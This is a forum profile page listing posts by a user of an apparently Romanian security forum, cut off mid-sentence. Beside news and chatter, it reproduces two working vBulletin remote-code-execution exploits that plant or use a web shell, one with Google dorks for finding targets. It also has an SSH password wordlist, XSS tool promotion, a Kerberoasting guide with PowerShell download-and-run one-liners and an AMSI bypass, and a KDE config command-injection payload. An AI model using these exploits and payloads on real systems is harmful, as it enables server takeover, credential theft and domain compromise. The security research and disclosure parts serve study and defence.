Jump to content

Nytro

Administrators
  • Content Count

    16632
  • Joined

  • Last visited

  • Days Won

    288

Everything posted by Nytro

  1. Samsung: Anyone's thumbprint can unlock Galaxy S10 phone Image captionA graphic symbol tells users where they need to press to provide a fingerprint A flaw that means any fingerprint can unlock a Galaxy S10 phone has been acknowledged by Samsung. It promised a software patch that would fix the problem. The issue was spotted by a British woman whose husband was able to unlock her phone with his thumbprint just by adding a cheap screen protector. When the S10 was launched, in March, Samsung described the fingerprint authentication system as "revolutionary". Air gap The scanner sends ultrasounds to detect 3D ridges of fingerprints in order to recognise users. Samsung said it was "aware of the case of S10's malfunctioning fingerprint recognition and will soon issue a software patch". South Korea's online-only KaKao Bank told customers to switch off the fingerprint-recognition option to log in to its services until the issue was fixed. Previous reports suggested some screen protectors were incompatible with Samsung's reader because they left a small air gap that interfered with the scanning. Thumb print The British couple who discovered the security issue told the Sun newspaper it was a "real concern". After buying a £2.70 gel screen protector on eBay, Lisa Neilson registered her right thumbprint and then found her left thumbprint, which was not registered, could also unlock the phone. She then asked her husband to try and both his thumbs also unlocked it. And when the screen protector was added to another relative's phone, the same thing happened. Sursa: https://www.bbc.com/news/technology-50080586
  2. Daca inveti C++ o sa iti fie usor pe viitor sa inveti orice alt limbaj.
  3. Cand e vorba de astfel de discutii apar si oamenii dornici sa "discute".
  4. Butonul din meniu (langa Downloads) e legat de aceasta aplicatie.
  5. Nytro

    ECSC

    Buna intrebare. Nu am idee, dar poate ne spun ei daca sunt.
  6. Nytro

    ECSC

    Pentru cei care nu au aflat inca, echipa Romaniei a obtinut primul loc. Felicitari!
  7. Nytro

    Parole SSH

    Cautam un dictionar de parole comune pentru SSH si am gasit parolele voastre. Aici e lista: https://github.com/jeanphorn/wordlist/blob/master/ssh_passwd.txt Iar aici e o lista cu parolele voastre (nu?): 123parola321esniffu321$#@!nuirootutaudeateuita#@!@#$ teiubescdartunumaiubestiasacahaidesaterminam cutiacusurprize 119.161.216.250 SCANEAA VNC deathfromromaniansecurityteamneversleepba viataeocurva-si-asa-va-ramane-totdeauna vreau.sa.urc.255.de.emechi.pe.undernet MaiDuteMaiTareSiLentDacileaWaiCacatule SugiPulaMaCaNuEastaParolaMeaDeLaSSHD Fum4tulP0@t3Uc1d3R4uD3T0t!@#$%^%^&*? [www.cinenustieparolasugepula.biz] saracutaveronicaisacamcoptpasarica p00lanmata 122.155.12.45 SCAN VNC suntcelmaitaresinimeninumadoboara doimaiomienouasuteoptzecisicinci ------Brz-O-Baga-n-Mata--------- ana.este.o.dulceata.de.fata.2011 Th3Bu1ES@VaDCuMm3RgeLak3T3LL1!!! bin;Fum4tulP0@t3Uc1d3R4uD3T0t!@ amplecat10sastingbecuinbeci2003
  8. Discuss anonymously with nearby people Clandesto is the place where you can discuss anything, with people within your radius and get awarded with karma points. APP STORE PLAY STORE So what's Clandesto all about? Local community Clandesto is your local community that shows you a live feed from people within your radius. Share news, events, funny experiences, and jokes easier than ever! Join your community Upvote the good and downvote the bad. By voting on posts, you have the power to decide what's your community talking about. Install CLANDESTO Find your group Find your local group, wether it's a neightbourhood, college campus, district, or village. You can also start your own private or public group. Find your group Website: https://clandesto.app/ Twitter: https://twitter.com/clandestoapp Facebook: https://www.facebook.com/clandesto/ Detalii: https://start-up.ro/cand-gdpr-ul-iti-da-o-idee-de-business-clandesto-socializare-anonima/
  9. Nytro

    ECSC

    Azi si maine are loc ECSC, in Bucuresti (Palatul Parlamentului). Scorul se poate vedea live aici: https://ecsc.eu/
  10. <?php /* --------------------------------------------------------------------- vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability --------------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.vbulletin.com/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "data[extension]" and "data[filedata]" parameters to the "ajax/api/user/updateAvatar" endpoint is not properly validated before being used to update users' avatars. This can be exploited to inject and execute arbitrary PHP code. Successful exploitation of this vulnerability requires the "Save Avatars as Files" option to be enabled (disabled by default). [-] Disclosure timeline: [30/09/2019] - Vendor notified [03/10/2019] - Patch released: https://bit.ly/2OptAzI [04/10/2019] - CVE number assigned (CVE-2019-17132) [07/10/2019] - Public disclosure */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[-] cURL extension required!\n"); print "+-------------------------------------------------------------------------+"; print "\n| vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Exploit by EgiX |"; print "\n+-------------------------------------------------------------------------+\n"; if ($argc != 4) { print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n"; print "\nExample....: php $argv[0] http://localhost/vb/ user passwd"; print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n"; die(); } list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n"; curl_setopt($ch, CURLOPT_URL, $url); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login"); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}"); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[-] Logged-in! Retrieving security token...\n"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n"); print "[-] Uploading new avatar...\n"; $params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture"); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HEADER, false); if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n"); if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n"); print "[-] Updating avatar with PHP shell...\n"; $php_code = '<?php print("____"); passthru(base64_decode($_SERVER["HTTP_CMD"])); ?>'; $params = ["routestring" => "ajax/api/user/updateAvatar", "userid" => 0, "avatarid" => 0, "data[extension]" => "php", "data[filedata]" => $php_code, "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); if (curl_exec($ch) !== "true") die("[-] Update failed!\n"); print "[-] Launching shell...\n"; preg_match('/(\d+)\.jpeg/', $path, $m); $path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path); curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}"); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nvb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } Sursa: http://karmainsecurity.com/pocs/CVE-2019-17132
  11. Mai e cineva interesat? Astept PM.
  12. Upgrade IPBoard. Sa imi ziceti daca apar probleme.
  13. Dap, se discuta si pe la ei: https://forum.vbulletin.com/forum/vbulletin-5-connect/vbulletin-5-connect-questions-problems-troubleshooting/vbulletin-5-support-issues-questions/4422616-important-vb5-remote-exploit-in-the-wild PS: Sper sa nu te atace si pe noi hackerii cu acest exploit.
  14. Nytro

    XSSer

    Introduction: Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. It provides several options to try to bypass certain filters and various special techniques for code injection. ---------- XSSer has pre-installed [ > 1300 XSS ] attacking vectors and can bypass-exploit code on several browsers/WAFs: - [PHPIDS]: PHP-IDS - [Imperva]: Imperva Incapsula WAF - [WebKnight]: WebKnight WAF - [F5]: F5 Big IP WAF - [Barracuda]: Barracuda WAF - [ModSec]: Mod-Security - [QuickDF]: QuickDefense - [Chrome]: Google Chrome - [IE]: Internet Explorer - [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel - [NS-IE]: Netscape in IE rendering engine mode - [NS-G]: Netscape in the Gecko rendering engine mode - [Opera]: Opera Current version: Download: Snapshot (.tar.gz): XSSer v1.8-1.tar.gz | Torrent (.tar.gz): XSSer v1.8-1.tar.gz.torrent wget https://xsser.03c8.net/xsser/xsser_1.8-1.tar.gz tar xf xsser_1.8-1.tar.gz cd xsser sudo python setup.py install ./xsser -h ./xsser --gtk (for gui) Snapshot (.zip): XSSer v1.8-1.zip | Torrent (.zip): XSSer v1.8-1.zip.torrent ALL: MD5/checksums Captures: URL/Hash Generation Schema: +Zoom Shell: +Zoom Manifesto: +Zoom Configuration: +Zoom Bypassers: +Zoom GeoMap: +Zoom Documentation: 2012 at RootedCon | [ Slides: "XSSer - The Cross Site Scripting framework": Spanish ] - [ Video: Spanish ] 2011 at THSF'11 | [ Slides: "XSSer - The Mosquito": English ] 2009 at Cyberspace | [ Paper: "XSS for fun and profit": English | Spanish ] Installation: XSSer runs on many platforms. It requires Python and the following libraries: python-pycurl - Python bindings to libcurl python-xmlbuilder - create xml/(x)html files - Python 2.x python-beautifulsoup - error-tolerant HTML parser for Python python-geoip - Python bindings for the GeoIP IP-to-country resolver library On Debian-based systems (ex: Ubuntu), run: sudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip Source Code: Xsser can be cloned from different code respositories. This option is a good idea if you want to [ --update ] automatically the tool, every some time. +Official: https://code.03c8.net/epsylon/xsser ex: git clone https://code.03c8.net/epsylon/xsser +Mirror: https://github.com/epsylon/xsser ex: git clone https://github.com/epsylon/xsser Packages: XSSer v1.7.2b: "ZiKA-47 Swarm!" : Download (.zip): XSSer v1.7-2.zip | Torrent (.tar.gz): XSSer v1.7-2.tar.gz.torrent | Torrent (.zip): XSSer v1.7-2.zip.torrent Ubuntu/Debian (64-bits) package: xsser_1.7-1_amd64.deb wget https://xsser.03c8.net/xsser/xsser_1.7-1_amd64.deb sudo dpkg -i xsser_1.7-1_amd64.deb xsser -h xsser --gtk (for gui) --------------------- XSSer v1.6: "Grey Swarm!": Download (.tar.gz): XSSer v1.6-1.tar.gz RPM package: XSSer-1.6-1.noarch.rpm Ubuntu/Debian package: XSSer-1.6_all.deb --------------------- XSSer v1.5: "Swarm Edition!": Ubuntu/Debian: xsser_1.5-1_all.deb.tar.gz --------------------- XSSer v1.0: "The mosquito": Ubuntu/Debian: xsser_1.0-2_all.deb.tar.gz License: XSSer is released under the terms of the General Public License v3 and is copyrighted by psy. Support: This framework is actively looking for new sponsors and funding. If you or your organization has an interest in keeping XSSer, please contact directly. XSSer has been one of the winner projects of the NLnet Awards of April (2010) XSSer has been added to BackTrack Linux (2010) XSSer has been added to OWASP project (2012) XSSer has been added to Cyborg Linux (2015) XSSer has been added to Kali Linux (2016) XSSer has been added to BlackArch (2016) [ ... ] For donations: [ BTC:19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw ] Sursa: https://xsser.03c8.net/
  15. #!/usr/bin/python # # vBulletin 5.x 0day pre-auth RCE exploit # # This should work on all versions from 5.0.0 till 5.5.4 # # Google Dorks: # - site:*.vbulletin.net # - "Powered by vBulletin Version 5.5.4" import requests import sys if len(sys.argv) != 2: sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0]) params = {"routestring":"ajax/render/widget_php"} while True: try: cmd = raw_input("vBulletin$ ") params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;" r = requests.post(url = sys.argv[1], data = params) if r.status_code == 200: print r.text else: sys.exit("Exploit failed! :(") except KeyboardInterrupt: sys.exit("\nClosing shell...") except Exception, e: sys.exit(str(e)) Sursa: FullDisclosure
  16. Se pare ca primim ceva DDOS de la IP-uri de Google Cloud. Am blocat temporar clasele 34.0.0.0/8, 35 si 104 si mai adaug cate ceva daca mai apar. Le scot ulterior.
  17. Full Steam Ahead: Remotely Executing Code in Modern Desktop Application Architectures - Thomas Shadwell - INFILTRATE 2019
  18. How to: Kerberoast like a boss Neil Lines 18 Sep 2019 Kerberoasting: by default, all standard domain users can request a copy of all service accounts along with their correlating password hashes. Crack these and you could have administrative privileges. But that’s so 2014. Why write a blog post about this in 2019 then? It still works well, yet there are plenty of tips and tricks that can be useful to bypass restrictions that you come up against. That’s what this post is about. The process required to perform Kerberoasting is trivial thanks to the original research by Tim Medin, but what more can we learn? Everyone needs a lab Having a lab is key to testing, if you want to attempt any of the exploitation detailed in this blog, I would recommend building your own virtual Windows domain using whichever virtualisation solution you prefer. You can download free 90-day Windows host VM’s from the following link. https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 180-day trial ISO’s of Windows server 2008R2, 2012R2, 2016 and 2019 can be downloaded from the following links. https://www.microsoft.com/en-gb/download/details.aspx?id=11093 https://www.microsoft.com/en-gb/evalcenter/evaluate-windows-server-2012-r2 Not created a virtual domain before? Its easy, this post explains all. https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/ Kerberoasting In 2014 Tim Medin did a talk called Attacking Kerberos: Kicking the Guard Dog of Hades where he detailed the attack he called ‘Kerberoasting’. This post won’t revisit the how’s and why’s of how Kerberoasting works, but it will detail a number of different techniques showing you how to perform the exploitation. It will also include the results from testing each method using my lab to help demonstrate. There’s more on the theory behind Kerberoasting. http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/ …you can also watch Tim’s talk. https://www.youtube.com/watch?v=HHJWfG9b0-E Quick update Kerberoasting results in you collecting a list of service accounts along with their correlating password hashes from a local domain controller (DC). You do need to reverse any collected hashes but it’s well worth attempting the process because service accounts are commonly part of the domain administrative (DA), enterprise administrative (EA) or local administrator group. Blast in the past A few years back while PowerShell (PS) was ruling the threat landscape, it was the go-to method for remote red teams or internal infrastructure testing. Back then you could simply fire up a PS session, copy and paste a PS one-liner and be well on the way to collecting an account which belongs to the DA group. Let’s go back in time for a minute and review using a PS one-liner to perform Kerberoasting. We start off by opening PowerShell then running a dir command to view the contents of our user’s home directory. Then copy and paste the following one-liner into PS and run it by pressing enter. powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" What does this do? The above one-liner instructs PS to relaunch, but this time set the ExecutionPolicy to bypass. This enables untrusted scripts to be run. The ‘New-Object System.Net.WebClient).DownloadString’ is used to download the Invoke-Kerberoast.ps1 script from the defined location, followed by loading the script in to memory. The final section Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt runs the Kerberoast request, followed by detailing how the results should be returned. In the above example they are set to match hashcat’s password cracking tools file format requirements, followed by the defined name and file type. In short order: it downloads the script, runs it all in RAM and outputs the results ready for you to crack using hashcat. After running the one-liner, you should see no response. To review the results simply rerun the dir command to reveal created file named ‘kerb-Haah0.txt’. Manually open the directory then double click on the created file to open it in notepad. If you’re working remotely you can use the type command followed by the name of the .txt file you wish to view. The following screenshot details an extract from the collection of two service accounts from my lab. While it looks confusing to start with the word following the * character is the username of the service account, so in the case of this demo the collected service account usernames are user1 and DA1. Personally, I’d review the domain groups for each collected service account, there is a time cost associated with the reversal process of attempting to crack the collected hashes. If an account will not assist you in privilege escalation, I wouldn’t waste the time trying reverse it. Enumeration of user1 reveals it’s a typical domain user. net user /domain user1 Enumeration of the account titled DA1 reveals that its part of the DA and EA groups, meaning it has unrestricted administrative access over all domain joined machines and users. net user /domain da1 The Reversal To reverse collected Kerberoasted hashes you can use hashcat, here’s how to do that. The previous section titled ‘Blast in the past’ resulted in the collection of a service account with the username of ‘DA1’. To start the reversal process you need to copy the complete hash starting with the first section ‘$krb5tgs’ all the way to the end and then paste this into a file. You can add as many of the collected hashes as you like but just make sure each one is on its own new line. The screenshot below shows an extract of the collected ‘DA1’ hash. For this demo I’m using hashcat version 5.1.0. You can download a copy of from the following location. https://hashcat.net/hashcat/ I run hashcat locally on my laptop which uses Windows 10 as a base OS. Although the graphics card is below average for a similar laptop it can still chug through a Kerberoasted hash using a good size dictionary in a short time. The hashcat command to reverse Kerberoasted hashes is as follows hashcat65.exe -m 13100 hash.txt wordlist.txt outputfile.txt This shows the command I ran to reverse the ‘da1’ hash. hashcat64.exe -m 13100 "C:\Users\test\Documents\Kerb1.txt" C:\Users\test\Documents\Wordlists\Rocktastic12a --outfile="C:\Users\test\Documents\CrackedKerb1.txt" The above process took 44 seconds to recover the password. The screenshot shows the response from hashcat on completion. The 1/1 indicates that of the provided 1 hash, 1 was reversed. Finally, opening the file titled ‘CrackedKer1.txt’ reveals the reversed password of ‘Passw0rd!’ which is always placed at the end of the hash. To verify the account had administrative rights across my lab domain I tried the account with an RDP session to my local DC. It used to be fun Windows 10 with its fancy Defender and Antimalware Scan Interface (AMSI) has mostly ruined PS one-liners for us, so how can we get around this? Well, if your targets are using defender (which is still quite rare in the enterprise wild) you’re in luck, as there are some very well documented bypasses for AMSI. Mohammed Danish published a post titled How to Bypass AMSI with an Unconventional PowerShell Cradle, you can read it here. https://medium.com/@gamer.skullie/bypassing-amsi-with-an-unconventional-powershell-cradle-6bd15a17d8b9 Quick version: the Net.WebClient function, which is commonly used is used in one-liners, has a signature in AMSI by replacing this function with the System.Net.WebRequest clas. The one-liner runs because there is no signature for it. The following weaponises that AMSI bypass with the Kerberoast request. $webreq = [System.Net.WebRequest]::Create(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1’); $resp=$webreq.GetResponse(); $respstream=$resp.GetResponseStream(); $reader=[System.IO.StreamReader]::new($respstream); $content=$reader.ReadToEnd(); IEX($content); Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt It doesn’t use AMSI This was a new one to me. While on a client site recently I tried the Kerberoast one-liner, but it was blocked by their AV. So I thought I would try the above AMSI bypass which was also blocked. The problem was that their AV solution did not rely on Microsoft AMSI to signature potential threats, and it had its own solution for verifying potential malicious PS scripts. My initial thoughts were, what do I do now? Well this is where Rubeus (a C# toolset for raw Kerberos interaction and abuses) comes out to play. So, while they block most forms of PS, do they block C#? The answer is not a lot do at present. You can read more about Rubeus here. https://github.com/GhostPack/Rubeus Rubeus comes uncompiled. Don’t stress over this though as it’s not as hard to compile C# scripts as it might seem. For this demonstration I used Microsoft’s free visual studio which I downloaded and installed into a Windows 10 VM. https://visualstudio.microsoft.com/vs/community/ During the install process visual studio prompts you to select what you need.I ticked the following two. Following the installation of visual studio, git clone the Rebeus project from https://github.com/GhostPack/Rubeus and then to start the process double click the on .sln file. BTW an SLN file is a structure file used for organizing projects in Microsoft Visual Studio. Finally, to compile Rubeus click on the Start button. After running once, a complied .exe should have been created in the Debug directory which can be found under the Rubeus-master\Rubeus\ directories. This is the full directory location of the compiled .exe I created for this post. C:\Users\IEUser\Desktop\Rubeus-master\Rubeus\bin\Debug Following the compiling of Rubeus, you can run it to perform a Kerberoast with the following command. Rubeus.exe kerberoast /format:hashcat > Hash1 The .exe should run unprompted but I did notice an error in my Windows 10 VM which I downloaded from the developer.microsoft.com site. The error prompted me to install .NET Framework. You shouldn’t need to do this on target machine as you would typically find .NET already installed in production environments. Running it in my Windows 7 VM worked first time and resulted in the collection of both service accounts. These are the details from an extract of the ‘DA1’ account as collected using Rubeus. While the command defines the output as a hashcat format, it requires a little tweaking to be used in hashcat. The following section demonstrates what’s required to prepare the hash for the reversal process. Open the output file and highlight all of the hash that you wish to reverse and then copy and paste it into notepad++. Then highlight the first blank space right up to the first line. Then open Find and select the Replace tab. Leave the ‘Find what’ defined as the space, and add nothing to the ‘replace with’ section, then click ‘Replace All’. This should result in making the hash complete across one line, which is now ready for hashcat. No more Windows! What if you can’t bypass the AV restrictions? How about using your own Kali Linux- any flavour will do. For this demo I’m using Impacket. https://github.com/SecureAuthCorp/impacket IYou can download it from github by running the following: git clone https://github.com/SecureAuthCorp/impacket.git Before you can run the Kerberoast request you need to verify that you can ping the full internal Microsoft domain name from your Kali box. If you get no reply you need to add a static DNS entry. To do this use your edit program of choice, and add a single entry for the full domain referencing the IP address of their DC. gedit /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali 192.168.1.200 server1.hacklab.local Then try and ping the full domain name again. If you get a reply it’s looking good. ping server1.hacklab.local PING server1.hacklab.local (192.168.1.200) 56(84) bytes of data. 64 bytes from server1.hacklab.local (192.168.1.200): icmp_seq=1 ttl=128 time=3.25 ms 64 bytes from server1.hacklab.local (192.168.1.200): icmp_seq=2 ttl=128 time=0.519 ms To run the Kerberoast request from Impacket you need to move into the example’s directory. root@Kai:~# cd Desktop/ root@Kali:~/Desktop# cd impacket/ root@Kali:~/Desktop/impacket# cd examples/ …and finally the script you need to run is titled GetUserSPNs.py. The commands are as follows. ./GetUserSPNs.py -request Add-Full-Domain-Name/Add-User-Name A nice addition to this is the inclusion of the -dc-ip Add-DC-IP-Address switch which enables you to define which DC to point the request at. If all works as expected you’ll be prompted for the users password. After submitting that you should see the service accounts with their hashes. Final Thoughts Kerberoasting collects the service accounts along with their correlating password hash. It is possible to reverse these hashes in a relatively short time if the password is based on a weakly defined word. Enterprises should review their own service accounts in active directory to verify if they are actually necessary. The service accounts that are required should be set with a complex non-dictionary based password. Sursa: https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/
  19. The Year of Linux on the Desktop (CVE-2019-14744) [ kde , code execution ] 0x01 Introduction There’s been a lot of controversy regarding the KDE KConfig vulnerability along with the way I decided to disclose the issue (full disclosure). Some have even decided to write up blog posts analyzing this vulnerability, despite the extremely detailed proof-of-concept I provided. That’s why in this post I’m going to detail how I found the vulnerability, what led me to finding it, and what my thought process was throughout the research. Firstly, to summarize: KDE Frameworks (kf5/kdelibs) < 5.61.0 is vulnerable to a command injection vulnerability in the KConfig class. This can be directly exploited by having a remote user view a specially crafted configuration file. The only interaction required is viewing the file in a file browser and/or on the desktop. Sure, this requires a user downloading a file, however it’s not hard to hide said file at all. Exploit demo uploaded by Bleepingcomputer 0x02 Discovery After I had finished publishing the last couple EA Origin vulnerabilities, I really wanted to get back on Linux and focus on vulnerabilities specific to Linux distributions. I figured that with Origin’s client being written using the Qt framework, and the fact that KDE was also built using the Qt framework, that I would maybe try and look into that. In turn, it led me to checking out KDE. Another factor that probably played a part in this whole process was that I had been using KDE on one of my laptops, and was familiar enough with it that I could map out attack surface fairly easily. The first lightbulb moment Most of the research I was doing at the time was shared with a good friend of mine who has helped me previously with other vulnerabilities. Thankfully this makes it easy for me to share the thought process with you folks. Because I was looking into KDE, I decided to first look at their default image viewer (gwenview). The idea behind this was, “if I can find a vulnerability in the default image viewer, that should be a fairly reliable exploit”. Naturally, if we can host our payload in an image and trigger it when someone views it or opens it in their browser, it makes things really easy. The first lightbulb moment came to me when I realized that gwenview actually compiles a list of recently viewed files, and uses the KConfig configuration syntax to set these entries. What stood out to me was the shell variables. Massive red flag. Depending on how these variables are being interpreted, we may be able to achieve command execution. Clearly in File1 it’s calling $HOME/Pictures/kdelol.gif and resolving the variable, otherwise how would would gwenview figure out where the file is? To see if these configuration entries were actually interpreting shell variables/commands, I added some of my own input in Name2 After looking in gwenview… nothing different? Okay that kind of sucks, so I went back to my configuration file to see if anything changed. Turns out, gwenview interprets the shell variables when it gets launched, so in order for those recent files to be interpreted, gwenview must be freshly launched after the configuration file has been updated. Once that happens, the command will execute. As you can see, the command in the Name2 entry got interpreted, and resolved the output of the $(whoami). The reason why it reverted back to Name1 is because I duplicated entries with File. This doesn’t make much difference for us at the moment, as long as our commands are executing, that should be enough for us to move forward. Initially, I had no idea what the $e was supposed to mean, so I did the necessary digging and found the documentation for KDE System Configuration files. Turns out the $e is there to tell KDE to allow shell expansions. At this point, it wasn’t a vulnerability or a glaring issue at all. It definitely seemed dangerous though, and I was convinced more could be done to abuse it. After discovering KDE allows shell expansion in their config files, I sent a message to my buddy detailing what I had just learned. Here I present the idea that maybe a content injection type payload would be possible via the filename. Unfortunately I tried this, and KDE seems to properly parse new entries and escape them by adding an additional $. Either way, if you were to send someone a file with said payload, that would obviously be suspicious. Kind of defeats the purpose. At this point I wasn’t sure how to go about exploiting this issue. Surely there must be some way, this seems like a really bad idea. With that in mind, I got tired of trying the same thing over again and reading the same docs, so I took a break. The second lightbulb moment Eventually I came back to KDE and was browsing a directory where I needed to see hidden files (dotfiles). I went to Control > Show Hidden Files, and realized all of a sudden it created a .directory file in the current working directory. Okay, interesting. Being unsure of what this .directory file was, I looked at the contents. [Dolphin] Timestamp=2019,8,11,23,42,5 Version=4 [Settings] HiddenFilesShown=true The first thing I noticed was that it seemed to be consistent with the syntax that KDE uses for all of it’s configuration files. I instantly wondered if maybe those entries could be injected with a shell command, seeing as the .directory file was being read and processed by KConfig the moment the directory was opened. I tried injecting the version entry with my shell command, but it kept getting over-written. Didn’t seem like it was going to work. Now I was thinking “Hm, maybe KDE has some existing .directory files that could tell me something”. So I looked for them. zero@pwn$ locate *.directory /usr/share/desktop-directories/kf5-development-translation.directory /usr/share/desktop-directories/kf5-development-webdevelopment.directory /usr/share/desktop-directories/kf5-development.directory /usr/share/desktop-directories/kf5-editors.directory /usr/share/desktop-directories/kf5-edu-languages.directory /usr/share/desktop-directories/kf5-edu-mathematics.directory /usr/share/desktop-directories/kf5-edu-miscellaneous.directory [...] For an example, let’s take kf5-development-translation.directory and look at the contents. kf5-development-translation.directory: [Desktop Entry] Type=Directory Name=Translation Name[af]=Vertaling [...] Icon=applications-development-translation I noticed that within the [Desktop Entry] tag, certain entries were being called that had keys. For example, the af key on the name entry: Name[af]=Vertaling Seeing as KConfig is definitely checking entries for keys, let’s try adding a key with the $e option like the config documentation mentioned. Another thing that really interested me at this point was the Icon entry. Here it gives you the option to set the icon of either the current directory, or the file itself. If the file is simply named .directory, it will set properties for the directory it’s in. If the file is named payload.directory, only the payload.directory file will have the Icon, not the parent directory. Why does it work like this? We’ll get into that in a second. This is really appealing, cuz this means our Icon entry can get called without even opening a file, it can get called simply be navigating to a certain directory. If injecting a command with the $e key works here… dang, that was a little too easy, wasn’t it? Surely, you already know the outcome of this story when using the following payload: payload.directory [Desktop Entry] Type=Directory Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) 0x03 Under the Hood Like with any vulnerability, having access to the code can make our lives a lot easier. Having a full understanding of our “exploit” is essential in order to maximize impact and produce a good quality report. At this moment I had identified a few things: Issue is actually a design flaw in KDE’s configuration Can be triggered by simply viewing a file/folder The issue itself is clearly in KConfig, however if we can’t get the configuration entries called… there’s no way of triggering it. So there’s a couple parts to this. With this information, I decided to browse the code for KConfig and KConfigGroup. Here, I found a function called readEntry(). kconfiggroup.cpp We can see it’s doing a few things Checks for key in entry. If expand ($e) key exists, expandString() on the value being read. Obviously now we need to find out what expandString() is doing. Browsing around the docs we find the function in kconfig.cpp kconfig.cpp TL;DR: Checks for $ characters. Checks to see if () follows. Runs popen on the value Returns the value (had to cut off that part) That pretty much explains most of how this works, however I wanted to follow the code and find exactly where readEntry(), then expandString(), was getting called and executing our command. After searching around for quite a while on github, I determined that there was a function specific to desktop files, and that this function is called readIcon(), which is located in the KDesktopFile class. kdesktopfile.cpp Basically it just uses the readEntry() function and grabs the Icon from the configuration file. Knowing this function exists… we can go back to our sources and search for readIcon(). I had only been messing with .directory files up until now, but after reading some more of the code, it turns out that this KDesktopFile class is used for more than just .directory files. It’s used for .desktop files too (who would have thought??????? lol). Because KDE treats .directory and .desktop files as KDesktopFile’s and because the icon gets called from this class (or any other class, it doesn’t even matter in this case), our command will execute if we inject our command there. 0x04 Exploitation Finding ways to trigger readEntry SMB share method We know that if we can get someone to view a .directory or .desktop file, readEntry() gets called, and will thus execute our code. I figured there must be more ways to trigger readEntry. Ideally, fully remote, with less interaction, i.e NOT downloading a file. The idea that came to mind to solve this was to use an smb:// URI in an iframe to serve a remote share that the user would connect to, ultimately having our .directory file executed the moment they connected. Very unfortunately, KDE is unlike GNOME in the sense that it does NOT automatically mount remote shares, and does NOT trust .desktop/.directory files if they don’t already exist on the filesystem. This essentially defeats the purpose of having a user accidentally browse a remote share and have arbitrary code executed. It’s funny, because automounting remote shares has been a feature that KDE users have been asking for for a very long time. Had they implemented it, this attack could’ve been quite a bit more dangerous. Anyways, we can’t automatically mount remote shares, but KDE does have a client that’s meant to facilitate working with SMB shares that is apparently common among KDE users. This application is called SMB4k and doesn’t actually ship with KDE. Once a share has been mounted using SMB4k, it can be accessed in Dolphin. If we have write access to a public SMB share, (that people are browsing via smb4k) we can plant a malicious config file that would appear as the following when viewed in Dolphin, ultimately achieving code execution remotely. ZIP method (nested config) Sending someone a .directory or .desktop file would obviously raise a lot of questions, right? I’d imagine so. That’s what most of the commentary around this subject seems to suggest. Why doesn’t that matter? Because nesting these files and forging their file extensions is the easiest thing you could possibly imagine. We have options here. The first option is to create a nested directory, which will have its Icon loaded as soon as the parent directory is opened. This executes the code without even seeing or knowing the contents of the directory. For example, look at this httpd download from the Apache website. There’s no way that an unsuspecting user 